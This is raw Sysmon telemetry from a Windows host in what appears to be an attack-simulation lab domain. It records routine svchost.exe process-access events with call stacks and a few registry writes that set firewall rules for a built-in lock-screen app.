13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.399{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769|M=microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy|Name=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}|Desc=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDescription}|D=C:\Windows\SystemApps\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\|PFN=Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy| 13241300x800000000000000010956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.399{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{4C5DBECA-01A7-40A3-ADB1-745434940551}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}|Desc=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDescription}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769|EmbedCtxt=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}| 13241300x800000000000000010955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.383{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{F26CD381-EF9B-4B2D-A383-C789FD8FFC4A}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}|Desc=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDescription}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769|EmbedCtxt=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}| 10341000x800000000000000010954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 